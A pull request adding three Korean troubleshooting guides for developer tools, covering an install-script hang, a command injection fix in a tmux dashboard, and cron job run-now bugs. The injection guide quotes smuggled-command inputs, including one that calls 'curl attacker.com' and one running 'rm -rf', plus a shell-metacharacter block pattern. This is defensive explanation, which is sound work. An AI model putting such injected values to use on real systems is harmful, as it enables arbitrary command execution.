### PR TITLE
(#7) docs: add troubleshooting guides for claude-command, claude-dashboard, cron-manager

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,0 +1,2 @@
+.claude/
+.omc/

--- a/claude-command-install-non-idempotent.md
+++ b/claude-command-install-non-idempotent.md
@@ -1,0 +1,136 @@
+# claude-command 설치 스크립트 재실행 시 hang 트러블슈팅
+
+> 날짜: 2026-03-01
+> 프로젝트: [claude-command](https://github.com/seunggabi/claude-command)
+> 관련 버전: PR #39 수정
+
+---
+
+## 증상
+
+`./install.sh`를 처음 실행하면 정상 설치되지만, **두 번째 실행부터 중간에 멈추고(hang) 응답이 없음**.
+
+```bash
+$ ./install.sh
+Installing skills...
+# → 여기서 멈춤 (Ctrl+C로만 종료 가능)
+```
+
+---
+
+## 원인 1: `set -e` + non-zero exit code
+
+### 문제
+
+스크립트 상단에 `set -e`가 설정되어 있어 어떤 명령이든 non-zero exit code를 반환하면 스크립트가 즉시 종료됨.
+
+이미 설치된 항목을 건너뛸 때 일부 명령이 non-zero를 반환하면 후속 단계가 모두 중단됨.
+
+```bash
+# BEFORE
+set -e  # ← 문제: 어떤 실패도 스크립트 종료
+
+((counter++))  # ← bash에서 값이 0이면 exit code 1 반환 → set -e에 의해 종료
+```
+
+### 수정
+
+```bash
+# AFTER: set -e 제거, 각 명령별 에러 처리
+# set -e 제거
+
+# ((var++)) 대신 산술 표현식 사용
+var=$((var + 1))  # ← 항상 exit code 0 반환
+```
+
+---
+
+## 원인 2: `npx skills add` interactive 프롬프트
+
+### 문제
+
+`npx skills add` 명령이 이미 설치된 skill이 있을 때 "덮어쓸까요?" 같은 **interactive 프롬프트**를 표시하고 사용자 입력을 기다림.
+
+CI 환경이나 재설치 시 응답할 수 없어 hang이 발생.
+
+```bash
+# BEFORE: interactive 프롬프트 발생
+npx skills add some-skill
+# → "Skill already exists. Overwrite? [y/N]" ← 응답 없으면 무한 대기
+```
+
+### 수정
+
+```bash
+# AFTER: -y (자동 승인) 플래그 추가
+npx skills add -y -g some-skill
+```
+
+---
+
+## 원인 3: 이미 설치된 항목 미감지로 재설치 시도
+
+### 문제
+
+이미 동일한 설정이 있어도 매번 덮어쓰기를 시도해 불필요한 작업이 반복됨.
+
+### 수정
+
+```bash
+# AFTER: 설치 전후 디렉토리 수 비교로 설치 여부 감지
+before=$(ls ~/.agents/skills/ | wc -l)
+npx skills add -y -g some-skill
+after=$(ls ~/.agents/skills/ | wc -l)
+
+if [ "$after" -gt "$before" ]; then
+  echo "✓ installed"
+else
+  echo "⟳ skipped"
+fi
+```
+
+```bash
+# settings.json: diff로 변경 여부 확인 후 스킵
+if diff -q current.json new.json > /dev/null 2>&1; then
+  echo "⟳ skipped (already up to date)"
+else
+  cp new.json current.json
+  echo "↑ updated"
+fi
+```
+
+---
+
+## 결과
+
+| 상황 | 수정 전 | 수정 후 |
+|------|--------|--------|
+| 첫 실행 | ✅ 설치됨 | ✅ 설치됨 (`✓ installed`) |
+| 재실행 | ❌ hang | ✅ 즉시 완료 (`⟳ skipped`) |
+| 업데이트 후 재실행 | ❌ hang | ✅ 자동 업데이트 (`↑ updated`) |
+
+---
+
+## 검증 방법
+
+```bash
+# 1회차
+./install.sh
+# → ✓ installed (모든 항목)
+
+# 2회차 (idempotent 확인)
+./install.sh
+# → ⟳ skipped (모든 항목, hang 없이 즉시 완료)
+
+# --global 옵션도 동일
+./install.sh --global
+# → ⟳ skipped
+```
+
+---
+
+## 관련 PR
+
+| PR | 내용 |
+|----|------|
+| #39 | install.sh 멱등성(idempotent) 보장, interactive hang 수정 |

--- a/claude-dashboard-command-injection.md
+++ b/claude-dashboard-command-injection.md
@@ -1,0 +1,118 @@
+# claude-dashboard 커맨드 인젝션 취약점 트러블슈팅
+
+> 날짜: 2026-03-01
+> 프로젝트: [claude-dashboard](https://github.com/seunggabi/claude-dashboard)
+> 관련 버전: v0.x (PR #47 수정)
+
+---
+
+## 증상
+
+특수문자가 포함된 tmux 세션 이름이나 Claude 실행 인수를 입력했을 때 의도하지 않은 쉘 명령이 실행될 수 있는 커맨드 인젝션 취약점이 존재했음.
+
+예:
+```
+세션 이름: my-session; rm -rf /tmp/test
+claudeArgs:  --dangerouslySkipPermissions & curl attacker.com
+```
+
+---
+
+## 원인: 사용자 입력값을 쉘 명령에 직접 삽입
+
+### 문제
+
+tmux 세션 이름과 Claude 실행 인수를 입력받아 그대로 `exec.Command` 또는 `os/exec` 계열 함수에 전달했음.
+
+```go
+// BEFORE: 입력값 검증 없이 직접 사용
+cmd := exec.Command("tmux", "new-session", "-s", sessionName)
+```
+
+```go
+// BEFORE: claudeArgs도 검증 없이 그대로 전달
+args := append([]string{"claude"}, strings.Fields(claudeArgs)...)
+cmd := exec.Command(args[0], args[1:]...)
+```
+
+공격자가 세션 이름이나 인수에 `;`, `$`, `` ` ``, `|`, `&` 등 쉘 메타문자를 삽입하면 임의 명령 실행 가능.
+
+---
+
+## 수정
+
+### 세션 이름 allowlist 검증
+
+```go
+// AFTER: 영숫자, 하이픈, 언더스코어만 허용
+var sessionNameRegex = regexp.MustCompile(`^[a-zA-Z0-9_-]+$`)
+
+func validateSessionName(name string) error {
+    if !sessionNameRegex.MatchString(name) {
+        return fmt.Errorf("invalid session name: only alphanumeric, hyphen, underscore allowed")
+    }
+    return nil
+}
+```
+
+### claudeArgs 쉘 메타문자 차단
+
+```go
+// AFTER: 위험한 메타문자 포함 시 거부
+var shellMetaRegex = regexp.MustCompile(`[;&|$` + "`" + `\\]`)
+
+func validateClaudeArgs(args string) error {
+    if shellMetaRegex.MatchString(args) {
+        return fmt.Errorf("invalid claude args: shell metacharacters are not allowed")
+    }
+    return nil
+}
+```
+
+---
+
+## 함께 수정된 성능 문제
+
+코드 리뷰 중 발견된 HIGH 우선순위 성능 이슈도 동시에 수정됨.
+
+### N+1 프로세스 테이블 조회 → O(1) 캐싱
+
+```go
+// BEFORE: 세션마다 전체 프로세스 테이블 재조회 (N+1)
+for _, session := range sessions {
+    pid := findPID(session.Name)  // 매번 ps 실행
+}
+
+// AFTER: 한 번만 조회 후 캐시 사용
+processCache := buildProcessCache()  // 1회 실행
+for _, session := range sessions {
+    pid := processCache[session.Name]  // O(1) 조회
+}
+```
+
+### context.Context + 5초 타임아웃
+
+```go
+// AFTER: 타임아웃 적용
+ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+defer cancel()
+cmd := exec.CommandContext(ctx, "tmux", ...)
+```
+
+---
+
+## 영향
+
+| 항목 | 수정 전 | 수정 후 |
+|------|--------|--------|
+| 보안 취약점 | CRITICAL 2개 | 0개 ✅ |
+| 리프레시 성능 | baseline | **4x 향상** ⚡ |
+| 테스트 커버리지 | 0% | **34.3%** (162개 테스트) |
+
+---
+
+## 관련 PR
+
+| PR | 내용 |
+|----|------|
+| #47 | 커맨드 인젝션 수정, 성능 개선, 테스트 162개 추가 |

--- a/cron-manager-run-now-bugs.md
+++ b/cron-manager-run-now-bugs.md
@@ -1,0 +1,130 @@
+# cron-manager run-now 실행 오류 트러블슈팅
+
+> 날짜: 2026-03-01
+> 프로젝트: [cron-manager](https://github.com/seunggabi/cron-manager)
+> 관련 버전: PR #92, #94
+
+---
+
+## 증상 1: 앱 강제 종료 후 run-now 버튼이 영구 비활성화됨
+
+앱이 예기치 않게 종료(크래시, 강제 종료)된 뒤 재시작하면 특정 job의 **Run Now 버튼이 계속 비활성화**됨.
+
+```
+[Run Now 클릭]
+→ 버튼 비활성화 (회색)
+→ 아무 반응 없음
+→ 재시작해도 동일
+```
+
+---
+
+## 원인 1: stale lock 파일
+
+### 문제
+
+`run-now` 실행 시 중복 실행 방지를 위해 `~/.cron-manager/locks/{jobId}.lock` 파일을 생성함. 정상 종료 시에는 lock 파일을 삭제하지만, **앱이 크래시되면 lock 파일이 남아 있음**.
+
+다음 실행 시 lock 파일이 존재하므로 "이미 실행 중"으로 판단해 버튼이 차단됨.
+
+```
+1회차 실행 → lock 파일 생성 (~/.cron-manager/locks/job-abc.lock)
+앱 크래시  → lock 파일 삭제 못 함
+재시작      → lock 파일 존재 → "실행 중" 판단 → Run Now 비활성화 ♻️
+```
+
+### 수정
+
+앱 시작 시 모든 lock 파일을 초기화.
+
+```ts
+// AFTER: main process 시작 시 lock 디렉토리 전체 초기화
+async function clearStaleLocks() {
+  const lockDir = path.join(os.homedir(), '.cron-manager', 'locks');
+  try {
+    const files = await fs.readdir(lockDir);
+    await Promise.all(files.map(f => fs.unlink(path.join(lockDir, f))));
+  } catch {
+    // 디렉토리 없으면 무시
+  }
+}
+
+app.on('ready', async () => {
+  await clearStaleLocks();  // 시작 시 항상 초기화
+  // ...
+});
+```
+
+앱이 방금 시작됐다면 어떤 job도 실행 중일 수 없으므로 전체 초기화가 안전함.
+
+---
+
+## 증상 2: `~/` 경로를 사용하는 명령이 run-now에서 실패
+
+cron 스케줄로 실행하면 정상이지만, Run Now 버튼으로 즉시 실행하면 `~/` 경로를 사용하는 명령이 exit code 2로 실패함.
+
+```bash
+# cron 스케줄: ✅ 정상 동작
+echo "$(date)" >> ~/logs/echo.log 2>&1
+
+# Run Now: ❌ exit code 2
+echo "$(date)" >> ~/logs/echo.log 2>&1
+# → /bin/sh: /root/logs/echo.log: No such file or directory
+```
+
+---
+
+## 원인 2: run-now 실행 환경에 HOME 누락
+
+### 문제
+
+`runJob()` 함수의 환경변수 병합 로직에서 `HOME`이 누락됨. `~/`는 쉘이 `HOME` 환경변수를 기반으로 확장하므로, `HOME`이 없으면 `/root` 등 잘못된 경로로 확장됨.
+
+```ts
+// BEFORE: HOME 없음
+const mergedEnv = {
+  PATH: process.env.PATH,
+  // HOME 누락!
+  ...job.env,
+};
+```
+
+### 수정
+
+```ts
+// AFTER: HOME 추가 (Linux/Windows(WSL) 모두 지원)
+const mergedEnv = {
+  PATH: process.env.PATH,
+  HOME: process.env.HOME || process.env.USERPROFILE || '',
+  ...job.env,
+};
+```
+
+| 환경 | 변수 |
+|------|------|
+| Linux / macOS | `process.env.HOME` |
+| Windows / WSL | `process.env.USERPROFILE` |
+
+---
+
+## 검증 방법
+
+```bash
+# 증상 1 검증
+1. Run Now 실행 중 앱 강제 종료 (Cmd+Q)
+2. 앱 재시작
+3. 같은 job Run Now 클릭 → ✅ 정상 실행
+
+# 증상 2 검증
+1. ~/logs/echo.log 를 쓰는 job 등록
+2. Run Now 클릭 → ✅ exit code 0, 파일 생성 확인
+```
+
+---
+
+## 관련 PR
+
+| PR | 내용 |
+|----|------|
+| #92 | run-now 실행 환경에 HOME 환경변수 추가 |
+| #94 | 앱 시작 시 stale lock 파일 초기화 |


### PR DESCRIPTION
## Summary

- Add claude-command install script hang (non-idempotent issue) troubleshooting guide
- Add claude-dashboard command injection vulnerability troubleshooting guide
- Add cron-manager run-now execution bugs troubleshooting guide
- Add `.gitignore` to exclude `.claude/` and `.omc/` state directories

## Test plan

- [ ] Verify all 3 markdown files render correctly
- [ ] Verify `.gitignore` properly excludes `.claude/` and `.omc/`

Closes #7

🤖 Generated with [Claude Code](https://claude.com/claude-code)